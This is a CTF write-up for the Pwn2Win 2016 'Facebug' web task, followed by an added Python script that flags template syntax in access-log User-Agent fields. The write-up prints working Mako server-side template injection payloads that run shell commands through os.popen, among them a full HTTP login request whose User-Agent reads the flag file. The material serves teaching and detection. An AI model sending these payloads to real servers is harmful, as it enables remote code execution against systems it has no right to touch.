30-03-2016 / Ctf

Pwn2Win CTF 2016 Facebug Writeup

Below you can find my solution for the Facebug task from Pwn2Win CTF 2016.

We get a simple page with register and login functionality.

After logging in, the /profile subpage shows our login and User Agent.

We try several SQL Injection and XSS attacks, but no luck.

So maybe the User Agent?

After logging in with <script> as the User Agent, we notice this on the page:

<div class="media-body">
	<h5 class="media-heading"><strong>Security alert!</strong></h5>
	<p class="small text-muted"><i class="fa fa-clock-o"></i> 2016-03-26 15:10:11 GMT</p>
	<p>Suspicious activity detected. Alert sent to registered email.</p>
</div>

And indeed we get an email message:

Suspecious login from: %our_ip%

So maybe XSS there? Again no luck.

But the User Agent seems to be a good way to pwn this.

Maybe Server-Side Template Injection?

We try: {{ 7*7 }} and get 49 in response.

After several minutes and different payloads we know it's Mako Templates for Python.

It's quite easy to exploit:

<%
import os
x=os.popen('id').read()
%>
${x}

So the final solution is:

POST /login HTTP/1.1
Host: facebug.pwn2win.party:8080
Content-Length: 43
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml
Origin: http://facebug.pwn2win.party:8080/register
User-Agent: aaaa <% x=__import__('os').popen('cat flag').read() %> ${x} vv
Content-Type: application/x-www-form-urlencoded
Referer: http://facebug.pwn2win.party:8080/register
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
[email protected]&password=your_pass

And we get an email with the flag: CTF-BR{Rc3_1N_T3mpL4te_InJect10n_R0CKs_4_L0T}
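
Seen from the defender's side, the probes and the final request above stand out in web server logs because the User-Agent header carries template syntax. The following is an added example, not part of the original writeup: a Python scan of combined-format access log lines for such headers. The log lines, marker rules and function names are constructed for illustration.

```python
import re

# Combined Log Format:
# ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# Template syntax that has no place in a User-Agent header
# (assumed rule set covering the markers seen in this writeup).
MARKERS = {
    "mako_block": re.compile(r"<%!?.*?%>", re.S),  # <% python code %>
    "mako_expr": re.compile(r"\$\{.+?\}"),         # ${expression}
    "curly_expr": re.compile(r"\{\{.+?\}\}"),      # {{ 7*7 }} style probe
}


def scan_line(line):
    """Return (ip, request, [marker names]) for a suspicious line, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None  # not a combined-format line
    hits = [name for name, rx in MARKERS.items() if rx.search(m["ua"])]
    return (m["ip"], m["request"], hits) if hits else None


def scan(lines):
    """Scan an iterable of log lines and return only the findings."""
    return [finding for finding in map(scan_line, lines) if finding]


# Constructed sample lines (documentation IP ranges, benign payloads).
SAMPLE = [
    '192.0.2.10 - - [26/Mar/2016:15:09:02 +0000] "GET /profile HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/45.0"',
    '198.51.100.7 - - [26/Mar/2016:15:10:11 +0000] "POST /login HTTP/1.1" '
    '200 512 "-" "{{ 7*7 }}"',
    '198.51.100.7 - - [26/Mar/2016:15:14:40 +0000] "POST /login HTTP/1.1" '
    '200 512 "-" "aaaa <% x=1 %> ${x} vv"',
    '203.0.113.5 - - [26/Mar/2016:15:15:00 +0000] "GET / HTTP/1.1" '
    '200 1024 "-" "curl/7.47.0"',
]

if __name__ == "__main__":
    for ip, request, hits in scan(SAMPLE):
        print(ip, request, ",".join(hits))
```

Log-side detection only surfaces the attempt; the flaw itself is closed by never placing header values into template source and passing them to the renderer as data instead.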